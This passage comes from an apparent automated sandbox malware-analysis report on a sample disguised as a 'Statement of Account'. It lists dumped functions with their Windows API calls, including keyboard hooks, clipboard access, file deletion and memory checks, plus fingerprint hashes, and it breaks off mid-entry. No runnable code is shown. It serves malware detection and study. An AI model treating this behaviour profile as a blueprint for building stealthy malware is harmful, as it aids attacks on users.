                                                  • Opcode Fuzzy Hash: 5eb815a682686d8b53742bb9cccc9dd20ea2e07912839ab66a2e07a82235ae3e
                                                  • Instruction Fuzzy Hash: 6E41B4B1D00309DFDB14CFAAC884ADEBBB5BF48354F25816AE819AB210D7759985CF90
                                                  Function 06756C94 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 06757FE9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 624c6202b3bdf8aef436ac7fc7c3eb1bc882d1b5439c28f065cc4b352a32be49
                                                  • Instruction ID: 6dab9c44c703b322376f2ddbef1a7a0e8987fc82cd81f6532d0986543b895fe0
                                                  • Opcode Fuzzy Hash: 624c6202b3bdf8aef436ac7fc7c3eb1bc882d1b5439c28f065cc4b352a32be49
                                                  • Instruction Fuzzy Hash: D3415CB4900309CFDB54CF99C848AAABBF5FF88314F25C499D919AB321D375A841CFA0
                                                  Function 06758C6D Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: 9bc44acf7cd01c0ada71640a767754083550a5b373268bcb68640e52ee11b3c4
                                                  • Instruction ID: 2fb0a5a4ab9abb2c9ae36d63d94667c0451890602008b87b806584c9aff295de
                                                  • Opcode Fuzzy Hash: 9bc44acf7cd01c0ada71640a767754083550a5b373268bcb68640e52ee11b3c4
                                                  • Instruction Fuzzy Hash: 873103B0D01359DFDB54CF99C984BDEBBF5AF48304F24805AE404AB290D7B86945CB95
                                                  Function 06758C78 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: 61e31bf39750a47ee665f7904ffc11b08902c907822d775ebd776797ab0c09c1
                                                  • Instruction ID: ecce22c7fae3450d01a4ee524f083bc920bd8155b2d6cf3a9dd2d838be3a19a8
                                                  • Opcode Fuzzy Hash: 61e31bf39750a47ee665f7904ffc11b08902c907822d775ebd776797ab0c09c1
                                                  • Instruction Fuzzy Hash: B23112B0D01358DFDB54CF99C984B9DBBF5AF48304F20805AE404AB290D7B86944CB95
                                                  Function 00F0863A Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00F086D0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 997530ccf7b9787240f3dccf2d6fca2b8eae7197184f6d5cd867a6a7d088adcb
                                                  • Instruction ID: f8fcf87ec50a55682460c3c101cefd7dcfdc9c0ed39e8e5a231226e8053faa90
                                                  • Opcode Fuzzy Hash: 997530ccf7b9787240f3dccf2d6fca2b8eae7197184f6d5cd867a6a7d088adcb
                                                  • Instruction Fuzzy Hash: 9B2125B6C012089FCB10CF9AD884ADEFBF5FF88310F24805AE858AB245D7756945DFA4
                                                  Function 00F07800 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00F086D0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 5fd9ead2ec28ae9a7311ea28446744a4d71e63ae8c825b9a7a095c15f5cc7a28
                                                  • Instruction ID: dd34487c711d3580f5036e667e3a3c8780e63f4401fa3cdfa3fd54e4b9015525
                                                  • Opcode Fuzzy Hash: 5fd9ead2ec28ae9a7311ea28446744a4d71e63ae8c825b9a7a095c15f5cc7a28
                                                  • Instruction Fuzzy Hash: 952127B6C012089FCB10CF99D884ADEFBF5FB88310F14805AE958AB245C775A945DBA4
                                                  Function 0675238C Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 06752416
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 6de8af927df8594bcedfcba6e0daa71471450fc45e4d59e037da0dd1f5262679
                                                  • Instruction ID: 52e6f5b1b77e67e3452f89bcbb147aa2e9b1d85e0914d6d25d92c21a3e1c3b86
                                                  • Opcode Fuzzy Hash: 6de8af927df8594bcedfcba6e0daa71471450fc45e4d59e037da0dd1f5262679
                                                  • Instruction Fuzzy Hash: 27214CB1C053888FDB15CFAAC44469EBFF4EF8A314F15819AC458AB252C379A546CFA1
                                                  Function 06757090 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0675711F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 18d63245f96ac0fcf2f4fabe1eb5379a221b4dcfdfdb959bf0c3fde94bca1a76
                                                  • Instruction ID: 840015d003cea5a2ea1f5792f69cfa1a6ac0892f83714431becbd713f07aebeb
                                                  • Opcode Fuzzy Hash: 18d63245f96ac0fcf2f4fabe1eb5379a221b4dcfdfdb959bf0c3fde94bca1a76
                                                  • Instruction Fuzzy Hash: DC21E5B5900249DFDB10CFAAD984AEEFFF5FB48310F14845AE958A3210D379A944CFA5
                                                  Function 06756CD0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0675823D), ref: 067582C7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 50240b738e37facd6017dfd915e64f003065f6d706bdd6c8d6532407056d9a47
                                                  • Instruction ID: b5a162d6ed93158296c7820e7dad53a03c1204d1c39afc0885214aa910ced375
                                                  • Opcode Fuzzy Hash: 50240b738e37facd6017dfd915e64f003065f6d706bdd6c8d6532407056d9a47
                                                  • Instruction Fuzzy Hash: F4219AB1C043988FCB11DFA9C854AEFBFF4EF49310F1044AAD459A7251C378A944CBA5
                                                  Function 06757098 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0675711F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: d48c9364543e286aad10bb9460df7a141685b1c35718e224675f5fc1e9fb61f7
                                                  • Instruction ID: 13bba0b245edcfa3ecec3f072912bbcc24b6b1019b589fdfd19f674b8c4feb3c
                                                  • Opcode Fuzzy Hash: d48c9364543e286aad10bb9460df7a141685b1c35718e224675f5fc1e9fb61f7
                                                  • Instruction Fuzzy Hash: D921C6B59002499FDB10CFAAD984ADEFBF5FB48310F14845AE914A3350D379A944CFA5
                                                  Function 0675A8C3 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0675A943
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: d465a6dd2b41cf7e1ba9721f0ecd1fb77c9eb65f16f3cf94d523037dc0108386
                                                  • Instruction ID: 0b340a751160e642eadbb8e0f30eb2abb8c1a8898f0722e08b0795198fe8db28
                                                  • Opcode Fuzzy Hash: d465a6dd2b41cf7e1ba9721f0ecd1fb77c9eb65f16f3cf94d523037dc0108386
                                                  • Instruction Fuzzy Hash: E82134B5D002098FCB54DFAAC844BEEBBF5FB88310F10842AE459A7250C779A944CFA1
                                                  Function 00F077D8 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00F080D8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 74fba97dd7960a09ce2334e1b3953431222e69b05640c81e2fb65ec412a02115
                                                  • Instruction ID: 7d664c992147e6ee4b63da559e6d877b4bfec47d3e37af28e648570ffea93f0f
                                                  • Opcode Fuzzy Hash: 74fba97dd7960a09ce2334e1b3953431222e69b05640c81e2fb65ec412a02115
                                                  • Instruction Fuzzy Hash: 3C2144B1C006199BCB10DF9AC4447AEFBF4EF08320F10812AD818A7240D778A945DFE1
                                                  Function 00F08060 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00F080D8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 51a6d2d49171ffe405953d73f1c337798df0d6155164871e9d7963e63e88c002
                                                  • Instruction ID: b1b91b464e638f31f1edcf42d7d7c80afa0fc07a9460a898fb13b9b8470a40c5
                                                  • Opcode Fuzzy Hash: 51a6d2d49171ffe405953d73f1c337798df0d6155164871e9d7963e63e88c002
                                                  • Instruction Fuzzy Hash: 1D2142B1C0061A8BCB10CFAAC5447AEFBF0AF08320F14812AD859B7241D738A945CFA4
                                                  Function 0675A8C8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0675A943
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: beb1662e6a97d14ecf1921665b53bd89e7bd816cf9b1a7613f7aa165202a4d4f
                                                  • Instruction ID: 923065fe1018624681ec5f383d5fcc482e06ffbab02f1b29ed83a6eb92c82de7
                                                  • Opcode Fuzzy Hash: beb1662e6a97d14ecf1921665b53bd89e7bd816cf9b1a7613f7aa165202a4d4f
                                                  • Instruction Fuzzy Hash: 012102B5D002198FCB54DF9AC844BEEBBF5BB88310F10842AE459A7250C779A944CFA1
                                                  Function 00F0F778 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00F0F7DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 97c764ec7d897a7cfe44095264a528d2a1f36f189bb79c3e933e653f70365bfd
                                                  • Instruction ID: f8bfaccc66089a2927e9e2cb92789f4530d6b1efa47aa519648c77b0aed26852
                                                  • Opcode Fuzzy Hash: 97c764ec7d897a7cfe44095264a528d2a1f36f189bb79c3e933e653f70365bfd
                                                  • Instruction Fuzzy Hash: 2E11E2B1C0065A9BCB10DF9AC544A9EFBF4AF48320F14816AD918A7240D778A944CFE5
                                                  Function 067509A4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 06752416
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 563d27ea3dc9b998dc81a9e7305bbc3e674f53cb22b4eae9e64de1e0f83ae72b
                                                  • Instruction ID: 844652ef437bcc9b38c3b5d2364c8dbf277ea3927ba158cc0004e6f4d5e83896
                                                  • Opcode Fuzzy Hash: 563d27ea3dc9b998dc81a9e7305bbc3e674f53cb22b4eae9e64de1e0f83ae72b
                                                  • Instruction Fuzzy Hash: 031134B5C003488FDB10DF9AC448ADEFBF4EB48310F11806AD829B7201C379A945CFA1
                                                  Function 06756E34 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 06758B85
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: b18a817a56e4d23af9c8790c026599912d876ec108dd912882cf539c015f739c
                                                  • Instruction ID: 30aa54c0a3f23b0d60c6d1c09ecf634c071f24a3b53f97afa66594cb88308e79
                                                  • Opcode Fuzzy Hash: b18a817a56e4d23af9c8790c026599912d876ec108dd912882cf539c015f739c
                                                  • Instruction Fuzzy Hash: 8B1103B5804358CFDB20EF9AC448B9EBBF8EB48324F108459D519A7610C378A944CFA5
                                                  Function 06756CEC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0675823D), ref: 067582C7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 43f06c84c0828fa2b750f6cf5c76aa1dd2e4ad749f92306d89b2ebc5d59fc210
                                                  • Instruction ID: 4c8368fe9e1331ac880f1717a1078abc8d44c1fc7c12ace979ea48b351d06df0
                                                  • Opcode Fuzzy Hash: 43f06c84c0828fa2b750f6cf5c76aa1dd2e4ad749f92306d89b2ebc5d59fc210
                                                  • Instruction Fuzzy Hash: 781103B5804658CFCB50DF9AD448BAEBFF8EB48314F20845AD919A7240C778A944CFA5
                                                  Function 06758B29 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 06758B85
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 9d8b523e801efe350400af0ad8d5fd8d5371a04a969302a7c40566a6cca92801
                                                  • Instruction ID: b8ec6b8e4b512059b5e66942d10997e4dc79e309dd846b8adf020a757c7f8f99
                                                  • Opcode Fuzzy Hash: 9d8b523e801efe350400af0ad8d5fd8d5371a04a969302a7c40566a6cca92801
                                                  • Instruction Fuzzy Hash: 9D11F2B5C00258CFDB20DFAAD448B9EBBF8AB49324F148459D558A7610C378A544CFA5
                                                  Function 06758261 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0675823D), ref: 067582C7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: af9baf2f293cc26c5264e7a1b365f6e35d49020198dc53a4a5c69377f84fe7d9
                                                  • Instruction ID: f33fcd25355a39a18b8f9cfbc887c337bec93f3d507f11e42aad400b02878a02
                                                  • Opcode Fuzzy Hash: af9baf2f293cc26c5264e7a1b365f6e35d49020198dc53a4a5c69377f84fe7d9
                                                  • Instruction Fuzzy Hash: 571103B5C006588FCB50DF9AD848BAEBFF4EB48324F20845AD918A3240C778A944CFA5
                                                  Function 067BDB28 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: fb52c039c401d7545f4c65a5deb361541f2456a664cebecfea581e3fe3af0192
                                                  • Instruction ID: cb9444849f67348a67e24f1f6743512e7554e8d39c92e804065b44e4ed1789ac
                                                  • Opcode Fuzzy Hash: fb52c039c401d7545f4c65a5deb361541f2456a664cebecfea581e3fe3af0192
                                                  • Instruction Fuzzy Hash: B1419170E00609DFDB64DFA5D8557AEBBB6FF85300F208A2AE405E7244EB70D946CB81
                                                  Function 067BDB15 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 632eb3e9abef6217c03ff40c044dc875027dc194b110bd263a8e53a2bd33ca6a
                                                  • Instruction ID: 4b778b23d73ef520151ac44e366f01ddc43b46812566d162335ac9919b721709
                                                  • Opcode Fuzzy Hash: 632eb3e9abef6217c03ff40c044dc875027dc194b110bd263a8e53a2bd33ca6a
                                                  • Instruction Fuzzy Hash: C5419F70E10605CFDF65DF65D4847AEBBB2EF85300F209A2AE405E7250EB70D906CB41
                                                  Function 067BDB1F Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 7d29712acaf63a53a8fae51196976482bfd6c2bc4f5ed183c824dbb93425faac
                                                  • Instruction ID: 8d43eb6dfd1c12d14e7ad25ef1630b0917157bbe2e0a1bbdb6b8b3cd7d777911
                                                  • Opcode Fuzzy Hash: 7d29712acaf63a53a8fae51196976482bfd6c2bc4f5ed183c824dbb93425faac
                                                  • Instruction Fuzzy Hash: 5041BF30E00609CFDB64DFA5D8857AEBBB2FF85300F208A29E405E7240EB70D906CB81
                                                  Function 067B21ED Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 1282d11f18733dcf0ed6403d681e891184e56cab2eb1e42ab957b529bb750a0c
                                                  • Instruction ID: e78684f5284d4ad2fd81d7a5b35c1d04c0320b5bb4ded3d878e89a441841aaa0
                                                  • Opcode Fuzzy Hash: 1282d11f18733dcf0ed6403d681e891184e56cab2eb1e42ab957b529bb750a0c
                                                  • Instruction Fuzzy Hash: 2331FC30B012018FDB98AB7499547BF7BE2AF8A210F209428D406DB396DF35DE06CB91
                                                  Function 067B2200 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 87653dff569a308871129c69baa4045a8322e68619ef7bc72df4fa1d67aed449
                                                  • Instruction ID: 9979b4950a67976e6562e04c374a577458075d14df89537841d0b845444b1aa0
                                                  • Opcode Fuzzy Hash: 87653dff569a308871129c69baa4045a8322e68619ef7bc72df4fa1d67aed449
                                                  • Instruction Fuzzy Hash: 2C31CB30B002058FDB58AB7495547BE7AE6AF89200F209528D406DB396DE35DE06CB95
                                                  Function 067BFBD1 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
                                                  • API String ID: 0-2343686810
                                                  • Opcode ID: 8841eb39ffce8154f2a5be109cad193bb5e4effa4a31a50cffaebbb86a802d92
                                                  • Instruction ID: b61da231a8f48edeeb530ae3020dc34d8f199a421a3b7dccee635315419469bb
                                                  • Opcode Fuzzy Hash: 8841eb39ffce8154f2a5be109cad193bb5e4effa4a31a50cffaebbb86a802d92
                                                  • Instruction Fuzzy Hash: A5219074B00214DFDB549B788C05BAE7BF5AF8CB10F108569E50AEB3A1EB399D01DB85
                                                  Function 067BFBE0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
                                                  • API String ID: 0-2343686810
                                                  • Opcode ID: 49d427d7c1f860ebcc3f33133792d44bd01242b96d2b2ed85eb7db44a2cb1a97
                                                  • Instruction ID: 344c3d7fa7393f5bbe021b9e902101d5de92c6c9ff6c90e6510871335fd85f70
                                                  • Opcode Fuzzy Hash: 49d427d7c1f860ebcc3f33133792d44bd01242b96d2b2ed85eb7db44a2cb1a97
                                                  • Instruction Fuzzy Hash: B8112E74B102149FDB54DB78C909BAD7BF5AF4C710F108469E90AD7390DB399D019B85
                                                  Function 067BAE6B Relevance: .3, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c9e123e3f2ece80994bdbe5affff0fd8b191dc94313c96b6bd60d100cbf2885c
                                                  • Instruction ID: 34b8d977cc99c20a5101495e789295927bf6777e6187d1f6f0dd38ad8d875096
                                                  • Opcode Fuzzy Hash: c9e123e3f2ece80994bdbe5affff0fd8b191dc94313c96b6bd60d100cbf2885c
                                                  • Instruction Fuzzy Hash: 7EA18170F102098FEF64DAADD9907FEB6A6EB89710F205825E805E7395CE35DC41CB52
                                                  Function 067B5E30 Relevance: .2, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0dcec0f038f32de7629948fcacc663a0401207c219f9c268ee3f326e7d46d15e
                                                  • Instruction ID: 0f954fef57d1dc2c44d9789aeee9ba6a3917f923df73e130689ca448022a075f
                                                  • Opcode Fuzzy Hash: 0dcec0f038f32de7629948fcacc663a0401207c219f9c268ee3f326e7d46d15e
                                                  • Instruction Fuzzy Hash: A9619071F001114FEB64AA6AC8806AFBADBAFD4214F254479E80EDB364DE79DD0287D1
                                                  Function 067B3EE0 Relevance: .2, Instructions: 223COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
